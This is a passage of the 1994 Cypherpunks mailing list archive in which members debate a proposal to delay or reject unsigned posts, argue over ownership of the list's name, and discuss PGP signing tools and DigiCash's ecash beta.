From jamesd at netcom.com Thu Dec 1 00:04:34 1994 From: jamesd at netcom.com (James A. Donald) Date: Thu, 1 Dec 94 00:04:34 PST Subject: Warm, fuzzy, misleading feelings In-Reply-To: <199412010119.RAA06900@python> Message-ID: <199412010805.AAA27330@netcom16.netcom.com> -----BEGIN PGP SIGNED MESSAGE----- Dr. D.C. Williams writes > By the same token, I don't see how this proposal does much to spread > the Good Word. Maybe the sole intent is for the participants to share > in the warm, fuzzy feelings of "doing their part". Like flying a kite > for peace Actually it is even worse than that: It is like wearing red ribbons to protest AIDS. A checker that checked signatures for consistent ID would actually promote cryptography. A checker that merely checks if a signature looks like a signature merely makes cryptography look stupid, like a power ranger suit. I would entirely support a real checker, but not a toy checker. -----BEGIN PGP SIGNATURE----- Version: 7.9ui We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com -----END PGP SIGNATURE----- From mccoy at io.com Thu Dec 1 01:25:18 1994 From: mccoy at io.com (Jim McCoy) Date: Thu, 1 Dec 94 01:25:18 PST Subject: New cypherpunks motto... Message-ID: <199412010925.DAA05528@pentagon.io.com> Cypherpunks don't write code, they just bitch and moan about actually using it... jim From tcmay at netcom.com Thu Dec 1 01:57:25 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 1 Dec 94 01:57:25 PST Subject: Warm, fuzzy, misleading feelings In-Reply-To: <199412010805.AAA27330@netcom16.netcom.com> Message-ID: <199412010957.BAA23404@netcom3.netcom.com> James A. Donald wrote: (the topic being using ersatz sigs to defeat the sig inspector) > Actually it is even worse than that: It is like wearing red > ribbons to protest AIDS. > > A checker that checked signatures for consistent ID would > actually promote cryptography. > > A checker that merely checks if a signature looks like > a signature merely makes cryptography look stupid, like > a power ranger suit. I'm back in agreement with James Donald (Chomsky is spinning). More that just making crypto look stupid, a game to be played, this whole "toad will only check that the _form_ of crypto is sort of present" (caveat: this is short-hand for the case presented) defeats the whole purpose of user-to-user verfication. I'm interested in systems which actually allow me to _really verify_ sigs if I have to (not often, I hope, and expect), not get a casual comment from another system/user that it "appears" that a sig is attached. I wasn't kidding earlier today (apologies that I'm reading the later mail first, as I just got home) when I argued that toad messages ought to be signed. That is, all traffic from toad. If sigs are to be compelled (Note to Eric on a point he made earlier: a compelled sig is one which is compulsory if a post is not to be bounced, as per Eric's message about delaying and then eventually bouncing unsigned messages), which I consider unwise, then such sigs should *actually be checked*, with the resulting checked messages then signed by toad/Eric/Hugh/John/whatever. Anything less than this is actually counterproductive, as it fosters a non-Cypherpunkish view of placing trust in others to do what technology allows one to do directly. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay From tcmay at netcom.com Thu Dec 1 02:22:16 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 1 Dec 94 02:22:16 PST Subject: Mandatory sig workaround In-Reply-To: <199411302242.OAA11728@largo.remailer.net> Message-ID: <199412011022.CAA24283@netcom3.netcom.com> (I've returned from a day and evening away from this list to find, not unexpectedly, a lot of acrimony. As I have to skim through so many messages, it is my preference this early in the morning to comment mostly on things I agree with, as I just did with James Donald. (Right after posting on a point of agreement, I saw his negative reaction to my points, and lack the energy right now to respond to them.)) Eric Hughes wrote: > As a side note, if you want people to sign their notes, why aren't you > doing so now? > > For the same reason that Tim isn't--it's too difficult. > > Now I've just recently set up a new email machine and I expect that > I'll be able to get signing set up on it before the end of the year. > I have plenty of irons in the fire already, and this isn't the top > priority. "Plenty of irons in the fire" is indeed the crucial point. Learning how to make UQWK talk to AutoPGP in elm (or whatever) is apparently fine for some people (by my estimate, 20% of those who post), but many of the most valued (who shall remain nameless here) posters are *not* signing posts. I urge you all to watch who signs and who doesn't. Face it, some fraction of people on this list are gearheads, with their own Pentiums or Suns sitting on the Net and with lots of Unix/Linux tools they like to play with and that they can use to compile their premails and procmails and whatnot. More power to them. But many of us have "other irons in the fire" and don't plan anytime soon to abandon our existing tools (in my case, a PowerMac 7100AV, with video digitizers, etc., FrameMaker, Mathematica, SmalltalkAgents, etc.) in favor of more PGP-friendly Unix boxes. If people feel it would be better for the Cause if I eschewed writing on the issues I write aboue in favor of not writing, presenting, etc., and instead becoming a Unix gearhead, able to transparently sign all messages, then send your comments to me. > it would seem that signing > your own messages would be a good way of starting things toward the > direction you want to go. > > It certainly would. My priorities on this are to get myself set up > for signing. Then I need to get a recognizer written, then to hack > vacation to use alternate database files, then to get my own personal > resource list compiled, then to set my personal nagware. Only after > all that do I intend to alter the list. And I intend to do none of this, choosing to focus on other things, which is why I object to policies designed to modify behavior in the way being discussed in this recent thread. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay From tcmay at netcom.com Thu Dec 1 02:53:26 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 1 Dec 94 02:53:26 PST Subject: "Cyherpunks Named Official Signing Authority" In-Reply-To: <199412010052.QAA11972@largo.remailer.net> Message-ID: <199412011053.CAA25543@netcom3.netcom.com> Eric Hughes wrote: > > From: tcmay at netcom.com (Timothy C. May) > > If the intent of a "Compelled Signature" (tm) policy [...] > > Putting it in quotes doesn't prevent it from being a misrepresentation. > > Are you saying that adding notifications and delays is compulsion, or > not? First of all, I am generally commenting on this: "I am still considering the "sign-or-delay" proposal for the toad.com server, that is, sign your articles to the list or they'll be delayed and eventually rejected." [Eric Hughes, 1994-11-28] "Eventually rejected" mean to me that unsigned messages will not be passed through to the list. I call this a "compelled signature" in that the signature is compulsory, not optional. (We hopefully can avoid splitting semantic hairs about what "compelled" or "compulsory" means. A Driver's License is compulsory to drive, though one is free not to drive. If the "eventually rejected" situation is reached, then a digital sig is compelled in this sense; that one is free to leave the list or not to write posts does not significantly change this compulsory or compelled nature.) > Imagine the P.R. value to these Net.Cops: "But even the Cypherpunks > require all posts to be signed!." > > If the net cops are going to acknowledge a merit in a cypherpunks > position, I say let them. The opportunity to educate the other > listeners that signatures are not the same as personal identity is an > opportunity not to be missed, especially when your opponent hands it > to you. I strongly disagree with this. If a "Cypherpunks position" happens to be wrong (as many of us think is the case with this "sign your posts or face delay an, eventually, rejection")), then it is not automatically good that Net.Cops see it and respond to it. I say a system which sets up a person or site as arbiter of what is signed and what is not is counterproductive to our goals. It plays into the hands of those who wish to ban anonymous posts. (Clearly I am not saying that the Hughes proposal is a plane to ban anonymous posts, only that the "all posts should be signed" notion is very similar to Net.Cop proposals to associate all posts with personal identity. That the latest explication of the Hughes proposal says that the emphasis will be on _syntactic_ checking, and not actual verification, is a subtlety far beyond the Net.Cops who want real Signature Authorities to validate Citizen-Units messages.) In other messages this morning I have made my points about user-to-user verification being what is important. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay From tcmay at netcom.com Thu Dec 1 03:09:26 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 1 Dec 94 03:09:26 PST Subject: We are ALL guests (except Eric) In-Reply-To: <3bj4m6$r4a@bb.hks.net> Message-ID: <199412011109.DAA26184@netcom3.netcom.com> L. Todd Masco wrote: > Tim's come out strongly against the proposal, as has James. As far > as I can see, Tim's the only one that's raised the stakes to the > ultimatum, "Do it and I leave" (although it's not clear whether he means > the rejection or the slowdown of unsigned posts, and whether he'd instead > decide to use an auto-signing service. Tim?) ^^^^ I have no idea about these "auto-signing services." My inclination would be not to use them, as I rarely engage in "workarounds" to deal with situations where speed bumps have been placed in my way. If it's just a few minutes delay, who cares? If it's a few hours, I'll likely bombard the list with "Has anybody seen the message I posted?" messages. (There is no rule against this, so I expect to do this.) If my messages are delayed by many hours or days, then it is the same as if they been rejected...participation in threads is ended. (I think Jamie Lawrence made similar points, when he/she (I forget which)) made the point about minutes-hours-days being a tough issue.) I haven't said I plan to leave the list. I've said that if my posts are blocked/bounced/rejected, I would likely choose not to remain. (Reference to "I am still considering the "sign-or-delay" proposal for the toad.com server, that is, sign your articles to the list or they'll be delayed and eventually rejected." [Eric Hughes, 1994-11-28]) I will register a note of purely personal frustration that many have framed the current debate in terms of "Eric's list" and "If Eric wants to do it this way, then this is how it should be done," etc. I have no animosity toward Eric, but think this is a misguided rewriting of history. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay From tcmay at netcom.com Thu Dec 1 03:10:26 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 1 Dec 94 03:10:26 PST Subject: We are ALL guests (except Eric) In-Reply-To: <199412010039.QAA09228@netcom10.netcom.com> Message-ID: <199412011110.DAA26299@netcom3.netcom.com> James A. Donald wrote: > > Timothy C. May writes > > I rarely argue in terms of > > justice and fairness, so please don't imply that I have done so. > > Look at the title of this thread. If what you say is true, > you would not have responded to this thread. The title > would be meaningless or irrelevant to you. Huh? -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay From tcmay at netcom.com Thu Dec 1 03:28:18 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 1 Dec 94 03:28:18 PST Subject: Effects of Marking/Delaying Nonsigned Posts In-Reply-To: <199412010320.TAA12195@largo.remailer.net> Message-ID: <199412011128.DAA27458@netcom3.netcom.com> Eric Hughes wrote: > This afternoon I considered starting the initial delay at one minute > and incrementing the delay by one minute each time a message gets > delayed. Perhaps the increment would be 15 or 30 seconds--whatever. > The point is that the delay would ease in slowly and folks would get a > chance to adjust. A concrete basis for comment. I post about 4 messages a day to the Cypherpunks list. Many others post less than 1 per day, some only 1 every week or so. (And so on.) Effects on Active Posters (4 or so per day): 4 x 15 seconds = 1 minute after the first day = 30 minutes after the first month = 3 hours after the first 6 months = 6 hours after the first year (Double these numbers if the "30 seconds" figure is used.) Effects on Casual Posters: 2 per week x 15 seconds = 30 seconds after the first week = 2 minutes after the first month = 24 minutes after the first year Pretty clearly, casual posters would not be significantly affected, while active posters would be. The desired intent? I doubt it. But typical of mechanistic attempts to modify behavior. (Yes, seen on the Extropians list.) --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay From tcmay at netcom.com Thu Dec 1 03:42:12 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 1 Dec 94 03:42:12 PST Subject: We are ALL guests (except Eric) In-Reply-To: <199412010314.TAA12186@largo.remailer.net> Message-ID: <199412011142.DAA28100@netcom3.netcom.com> Eric Hughes wrote: > I apply Tim's Calvinist Stoicism stance to this situation. Put > crudely, if people bolt at the first sign of encroachment, fuck 'em. Indeed. But if my messages are bounced or delayed excessively, I will of course have no reason to remain. My own Calvinist Stoicism. I won't jump through hoops to meet pointless syntactical purity checkes. Whether I sign all messages will depend on whether certain tools become available and easily installable...at the current rate, I doubt it (for me, Netcom, elm, etc.). > This is both an advantage and a disadvantage. On one hand, harmony is > maintained. (I hear the guffaws too.) On the other, the message > isn't nearly as strong. To reiterate, I am willing to use my ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > position to send a stronger message. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Bluntly, Eric, this is what is so disturbing about your position. You are willing to "use your position" to essentially purge the list (through bounces, a la "sign your articles to the list or they'll be delayed and eventually rejected") of many of us who are unlikely to solve the various problems mentioned so many times here. You don't sign, others of note don't sign (some that I can think of right now: Gilmore, Finney, Zimmermann, and probably many others). You are _planning_ to now begin working on getting your won signing situation squared away, but many of us are on different schedules (Hint: It's even lower on the list of things to do for me). > OTGH, pgp is a bigger > cycle-sucker than I necessary want to have running all the time on our > poor little microVAXen. > > Yet another reason to have an less-than-fully secure key for that location. I don't buy this, and hence will have my messages delayed or bounced. I want my key to be useful for real uses, not just "Power Ranger" (a la James Donald) uses. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay From emw at ima.com Thu Dec 1 04:34:57 1994 From: emw at ima.com (Ed Wilkinson) Date: Thu, 1 Dec 94 04:34:57 PST Subject: We are ALL guests (except Eric) In-Reply-To: <199412011142.DAA28100@netcom3.netcom.com> Message-ID: <9412021223.AA07163@ima.com> Although I can see the reasons why it would be good to increase the use of digsigs, I don't think it's worth the possibility that many active members of this list will disappear. Even one would be too many, as we need all the support we can get. Sounds like an ideal challenge for somebody to massage the available tools to come up with something that *is* easy and convenient to use for signing messages, without compromising on security. It could even use standard PGP keyrings. Cypherpunks write code ... Ed -- Ed Wilkinson emw at ima.com IMA Ltd Internet Email Gateways From mark at unicorn.com Thu Dec 1 05:08:03 1994 From: mark at unicorn.com (Mark Grant) Date: Thu, 1 Dec 94 05:08:03 PST Subject: Hazards of encouraging forged dig sigs Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Wed, 30 Nov 1994, L. McCarthy wrote: >Encouraging cryptographically >valid signatures was the first suggestion I'd seen in this entire debate >which seemed to promise tangible benefits; encouraging cryptographically >invalid signatures is the first notion which appears to offer tangible >detriment. As one of the few people who verify all PGP signatures for which I have keys, I have to say that encouraging people to put garbage in PGP signature blocks would be extremely annoying. Either I'll have to go back to using a non-PGP-aware mail reader, or fix it to do something sensible with such messages. While I'm going to have to do the latter at some point anyway, there are much more useful things that I could be doing... Mark -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBLt3Kw6FlWzerDvH1AQEyTgP/bPz1NLXeicLD81Ijj8S6/m+D3Tmb363Q +Xj5MDsW+xBNC+p8ViKzZ+zvjZg5Cr6MsQ24TWT3n7DId7l2pAWyAH5JWf7OuW9u xvrfMfFas04RuOE8mjO7Gcp9E3eFNKz9MNQGlG7YwkPLX/twbF7+gX1RWkPGV2JE +b+KOjVkQbs= =lLbP -----END PGP SIGNATURE----- From roy at cybrspc.mn.org Thu Dec 1 05:46:58 1994 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Thu, 1 Dec 94 05:46:58 PST Subject: Mandatory sig workaround In-Reply-To: <199412011022.CAA24283@netcom3.netcom.com> Message-ID: <941201.071127.7W2.rusnews.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- I'm not at all sure what to make of where this argument is going. Tim May writes: > "Plenty of irons in the fire" is indeed the crucial point. Learning > how to make UQWK talk to AutoPGP in elm (or whatever) is apparently > fine for some people (by my estimate, 20% of those who post), but many > of the most valued (who shall remain nameless here) posters are *not* > signing posts. I urge you all to watch who signs and who doesn't. It may just be that it's early and I'm only on my first cup of coffee, but are you suggesting an inverse correlation between the quality of a submission and the presence of a signature, Tim? While I'd agree that many of the quality list members don't sign their articles, I don't think I can make the leap that signed messages have no useful content. Please tell me I misread you. > Face it, some fraction of people on this list are gearheads, with > their own Pentiums or Suns sitting on the Net and with lots of > Unix/Linux tools they like to play with and that they can use to > compile their premails and procmails and whatnot. More power to them. Or perhaps just a lowly 486 running DOS and UUCP. But I heard that Cypherpunks Write Code, so I wrote PGP support into my signature controller. I have signed all my email for 2 years, and all net traffic for nearly a year. Gearhead? Perhaps I am. But this ain't no Porsche. > But many of us have "other irons in the fire" and don't plan anytime > soon to abandon our existing tools (in my case, a PowerMac 7100AV, > with video digitizers, etc., FrameMaker, Mathematica, SmalltalkAgents, > etc.) in favor of more PGP-friendly Unix boxes. Which only underscores the need for better tools for the existing platforms. Yes, I'd like everyone to sign their traffic. But it's not always possible when the tools to do that are either non-existant or arcane (which means I'm in agreement with Tim on why he doesn't sign his traffic). > And I intend to do none of this, choosing to focus on other things, > which is why I object to policies designed to modify behavior in the > way being discussed in this recent thread. Tim, just for fun, what tools would need to appear to make it possible for you to sign your traffic? Maybe a description will inspire some of the Macheads out there to get hacking. (the astute reader will note that I'm not suggesting new tools to the erstwhile Mr. May, as has been done so often in the past) - -- More mindless typing exercise from roy at cybrspc.mn.org "Usenet is like a herd of performing elephants with diarrhea -- massive, difficult to redirect, awe-inspiring, entertaining, and a source of mind- boggling amounts of excrement when you least expect it."--Gene Spafford -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLt3PiBvikii9febJAQGWQQP/YmQsRfYRyg2C07Btj6Kj07n69QbPPnmY L0wyVP9Gw155Mb1PzMcMJYzsxEnPkAn7YasXJEyBic7q1wVtW1oI9mkzd0pdpzXp Arhlno+81W5/1GwZRuf5xlvAl/ZP81X3NgBSHvZz6il0bCrtsgvL8S2qX9Gye8ng zmESyqp4Ec4= =9kI0 -----END PGP SIGNATURE----- From shamrock at netcom.com Thu Dec 1 07:39:56 1994 From: shamrock at netcom.com (Lucky Green) Date: Thu, 1 Dec 94 07:39:56 PST Subject: [Bay Area] Meet the Ecash developers today Message-ID: <199412011540.HAA26971@netcom18.netcom.com> The folks from DigiCash are demonstrating Ecash, smartcard payment systems, and other goodies at the Cardtech West exhibition in the Santa Clara convention center. Today, Thursday, is the last day of the show, so get on out there. The show will be open from 10 am through 3 pm. No, Chaum himself won't be there. -- Lucky Green PGP encrypted mail preferred. "The very atmosphere of firearms anywhere and everywhere restrains evil interference - they deserve a place of honor with all that's good." From perry at imsi.com Thu Dec 1 07:58:54 1994 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 1 Dec 94 07:58:54 PST Subject: We are ALL guests (except Eric) In-Reply-To: Message-ID: <9412011558.AA03114@snark.imsi.com> Jonathan Rochkind says: > If my and my friends don't like coke, we can't copy their secret formula > and sell something in a red can with a white curve down the side and > "Coca-cola" written on it in cursive lettering. We'll be in court in about > four minutes. > > If me and my friends don't like the cypherpunks list, we can start our own > list called "cypherpunks." We can even get the list of subscribers from > toad (it's public information), and subscribe them all to our list, > although they might not appreciate it so much. A person buys a building and places a nightclub within. By your logic, he does not own the nightclub, because another person could open a nightclub. Were Eric to trademark "Cypherpunks" and use it in trade as the name of a mailing list, you could NOT create another one for the same reason you couldn't sell "Coke". The fact that Eric has no interest in doing this and doesn't claim to own the name does not change the situation. .pm From JLICQUIA at mhc.uiuc.edu Thu Dec 1 08:02:10 1994 From: JLICQUIA at mhc.uiuc.edu (JEFF LICQUIA (CEI)) Date: Thu, 1 Dec 94 08:02:10 PST Subject: Mandatory sig workaround Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > From: tcmay at netcom.com (Timothy C. May) > Face it, some fraction of people on this list are gearheads, with > their own Pentiums or Suns sitting on the Net and with lots of > Unix/Linux tools they like to play with and that they can use to > compile their premails and procmails and whatnot. More power to them. > > But many of us have "other irons in the fire" and don't plan anytime > soon to abandon our existing tools (in my case, a PowerMac 7100AV, > with video digitizers, etc., FrameMaker, Mathematica, SmalltalkAgents, > etc.) in favor of more PGP-friendly Unix boxes. Speaking as a "gearhead", I have a few observations... [Proof of gearhead status: My post is signed. I'm writing under Windows with an Ethernet to the world, using Pegasus Mail and PGPClip. I've got the mouse movements memorized. I run Linux at home and administer it at work, both with their own PGP and other k00l t00lz. I have encrypted filesystems on some of my boxes. I'm working on two personal projects directly spawned by this debate. None of my machines are Pentiums, though; I must only be a junior gearhead. :-] Considering our wonderful motto, "Cypherpunks write code", I'd say that Tim's assessment of the situation is more an indictment than anything else. Why the heck CAN'T Tim sign his posts easily despite his limited connectivity? I grant that it's not anyone's responsibility to take care of him for free; however, I can't see advocating hard-to-use crypto as a solution to any of the problems given here. I don't know about the rest, but I treat Tim's statement above as a personal challenge. (Go ahead. Just TRY to make me a package so easy to use I'll have no excuse. Just TRY it!) [Unfortunately, Tim, it's sad that you may not be able to benefit from any of my results. I'm clueless about Mac code and have no way of rectifying that; thus, my efforts are limited to Windows...] ObSigs: Perhaps once the tools are written, Eric's proposals won't seem so objectionable. If signing is just a matter of clicking and typing a pass phrase (no matter what your particular environment is like), then pushing sigs in this way doesn't seem like such a bad thing. I don't think that encouraging/requiring sigs will encourage net.cops to do anything that probably isn't a bad idea anyway, esp. since we don't have an Official Cypherpunks Certifying Authority(tm). > If people feel it would be better for the Cause if I eschewed writing > on the issues I write aboue in favor of not writing, presenting, etc., > and instead becoming a Unix gearhead, able to transparently sign all > messages, then send your comments to me. Well, Tim, I personally don't mind you kicking your responsibility to live up to the ol' motto and waste our time with your illuminating discourse. :-) [Before you flame me: The fact that you have reacted so angrily to the above statement indicates your answer to Tim's question. Believe me, the above is satire, and I would agree with you.] I think there's a place both for the gearheads and the visionaries. Sure, Tim doesn't contribute any code (generally!); on the other hand, I don't remember contributing too much in the way of vision (or code, for that matter :-). Maybe we should both get ourselves kicked off; after all, some (Eric comes to mind) have done both... [Eric here] > > It certainly would. My priorities on this are to get myself set up > > for signing. Then I need to get a recognizer written, then to hack > > vacation to use alternate database files, then to get my own personal > > resource list compiled, then to set my personal nagware. Only after > > all that do I intend to alter the list. > > And I intend to do none of this, choosing to focus on other things, > which is why I object to policies designed to modify behavior in the > way being discussed in this recent thread. As an aside, what would be a minimum standard for a usable enough solution? [Besides persuading Qualcomm, Microsoft, and the rest to put a "PGP" button in their mailers. I'm looking for an incremental step that can be done without connections.] An example of an idea I've had: Supposedly, Pegasus Mail for Windows (a SMTP/POP3 and MHS/NetWare mailer) will soon have DDE and OLE support. I'm thinking of a separate "PGP Shell for Pegasus" program that would load and do its thing by controlling the mailer through DDE (and maybe OLE). It would be a separate app (at least the DDE version would), but it would at least have the "click and go" kind of ease of use that I've heard people asking for. I'm working on a prototype that will do the same for Programmer's File Editor, a DDE-aware text editor (its only advantage: it's really here, unlike the DDE-aware mailers...). -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt3yyjER5KvPRd0NAQFxPwQAlVwcYVPOnpGYPTn2JZ5dj5F9NgJcGVoA vQl9WNPvkcmbno4bX2IOH5bANr3blJtJq2yn9l2Ta7UUWJ59FurkSbQFBEGofeAA vmnYuOJrcbST5bpZXPwV0nEkdJj6tCa/bQiTc1OweCs2szIqkEGWB09Z5U/2CDir JuJC7P5fzRs= =9h6O -----END PGP SIGNATURE----- From eric at remailer.net Thu Dec 1 08:02:20 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 1 Dec 94 08:02:20 PST Subject: "Cyherpunks Named Official Signing Authority" In-Reply-To: <199412011053.CAA25543@netcom3.netcom.com> Message-ID: <199412011701.JAA13163@largo.remailer.net> From: tcmay at netcom.com (Timothy C. May) First of all, I am generally commenting on this: "I am still considering the "sign-or-delay" proposal for the toad.com server, that is, sign your articles to the list or they'll be delayed and eventually rejected." [Eric Hughes, 1994-11-28] Tim, I've not been referring to that exact proposal for some time now. In very specific detail, I have dropped the premise that they might be rejected. This happened almost immediately after this recent discussion began. I wanted to restrict discussion to what might be implemented first to avoid the (alas, unavoided) less than productive discussions about what could happen later. Was I insufficiently clear that I was now discussing a smaller proposal? What I see is that you are refusing (by omission) to address the subject at hand. I see a direct, if not intentional, effort to address something that is not what I have been talking about. "Eventually rejected" mean to me that unsigned messages will not be passed through to the list. I call this a "compelled signature" in that the signature is compulsory, not optional. This is all well and good, but it is on a different but related subject. I ask again the quetion that I specifically asked before. I'll even not abbreviate to be clear that I'm actually asking for two things. Does a marking action by the server create a compulsion to sign? Does a delay action by the server create a compulsion to sign? Eric From jrochkin at cs.oberlin.edu Thu Dec 1 08:07:04 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Thu, 1 Dec 94 08:07:04 PST Subject: We are ALL guests (except Eric) Message-ID: perry at imsi.com wrote: >Were Eric to trademark "Cypherpunks" and use it in trade as the name >of a mailing list, you could NOT create another one for the same >reason you couldn't sell "Coke". The fact that Eric has no interest in >doing this and doesn't claim to own the name does not change the >situation. I think it does change the situation. I'm not even sure if Eric _could_ trademark the name "cypherpunks". Isn't there a requirement that it not be "common usage" or something at the time your copyright it? Assuming Eric could trademark the list, but just chooses not to, then what's to stop _me_ from getting a trademark on the name "cypherpunks" when I start my own competing list? If I started a competing list, named it cypherpunks (or better-cypherpunks, or whatever), and trademarked the name "cypherpunks", would that mean that I owned the cypherpunks list? Or would Eric still own it? Or would nobody own it? Intellectural property is a tricky business, whether you are just looking at it from the legal perspective, or whether you are looking at it from an ethical or pragmatic perspective. And the issue of "ownership" of the cypherpunks list seems a particular tricky instance of intellectual property, from a legal, ethical, or pragmatic point of view. It really doesn't seem to me that Eric "owns" cypherpunks in the same way I own my car, or even in the same way that Coca-cola "owns" the coke trademark, and the formula used to make coke beverage. There are some fundamental differences in what's going on. Cypherpunks isn't so much a service being provided by Eric as it is a group undertaking by all of it's participants. If Eric were to suddenly decide to become a buddhist monk and not have anything to do with cypherpunks anymore, and if John Gilmore were suddenly to decide not to allow the cypherpunks list on his machine, the list wouldn't cease to exist. It wouldn't even be hurt much at all. It would just move to a different machine, and get a new list administrator. From andrew_loewenstern at il.us.swissbank.com Thu Dec 1 08:21:17 1994 From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern) Date: Thu, 1 Dec 94 08:21:17 PST Subject: Mandatory sig workaround Message-ID: <9412011620.AA04944@ch1d157nwk> Roy Silvernail writes: > Tim, just for fun, what tools would need to appear to make it > possible for you to sign your traffic? Maybe a description will > inspire some of the Macheads out there to get hacking. (the astute > reader will note that I'm not suggesting new tools to the erstwhile > Mr. May, as has been done so often in the past) Perhaps I'm wrong, but doesn't MacPGP allow you to sign things on the clipboard? Are there any MacPGP users out there? If this is true (and I think it is), then I don't see what's holding Tim back... Compose message, select all, cut, sign, paste, deliver... andrew From hfinney at shell.portal.com Thu Dec 1 08:27:12 1994 From: hfinney at shell.portal.com (Hal) Date: Thu, 1 Dec 94 08:27:12 PST Subject: Brands excluded from digicash beta Message-ID: <199412011627.IAA14481@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- Last month I complained that my multiple attempts to request an account to try out the digicash beta-test ecash system had been ignored. I got half a dozen replies from people who had had exactly the same experience. Shortly afterwards, though, I got email from digicash saying that my account would be activated in a few days. This was on Oct. 21, and I have heard nothing since then. I just figured that I didn't have enough clout for them to bother to respond to me, but today on the www-buyinfo list, Stefan Brands, who many think has the best ecash technology available today, posted that he had had the same experience! Brands himself has still not been given an opportunity to join the beta test. He did not sound very happy about this. I can see that Chaum and Brands are potential competitors to an extent; they both have or will soon have patents which will be necessary for efficient offline systems. But it is clear to me that some form of cross licensing is going to be necessary to have a really clear patent situation. Under the circumstances it seems silly for Chaum to antagonize such an important player in the game. Of course, it may well be a matter of incompetence rather than insult, but the net result is the same. The more I see of digicash's lack of consideration towards their potential customers and important figures like Brands the more I question whether they have the potential to succeed. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLt35LhnMLJtOy9MBAQEyPwIA7gDKNK7T+vCp1I+YnUrsDb1sDhTWFO4T olTEgTZnLtbQMLe70bNni2jjL0SShFqHRpSNZbsEPt0UAdmf5Pcf+A== =MZXU -----END PGP SIGNATURE----- From jrochkin at cs.oberlin.edu Thu Dec 1 08:56:17 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Thu, 1 Dec 94 08:56:17 PST Subject: Mandatory sig workaround Message-ID: -----BEGIN PGP SIGNED MESSAGE----- At 11:20 AM 12/01/94, Andrew Lowenstern wrote: >Roy Silvernail writes: >> Tim, just for fun, what tools would need to appear to make it >> possible for you to sign your traffic? Maybe a description will >> inspire some of the Macheads out there to get hacking. (the astute >> reader will note that I'm not suggesting new tools to the erstwhile >> Mr. May, as has been done so often in the past) > >Perhaps I'm wrong, but doesn't MacPGP allow you to sign things on the >clipboard? Are there any MacPGP users out there? If this is true (and I >think it is), then I don't see what's holding Tim back... Compose message, >select all, cut, sign, paste, deliver... Not only does MacPGP allow you to sign the clipboard, but there are applescripts available so you can sign the clipboard without even switching to MacPGP and doing it manually. Just choose the script from a pulldown menu, and everything happens automatically (you have to type in your 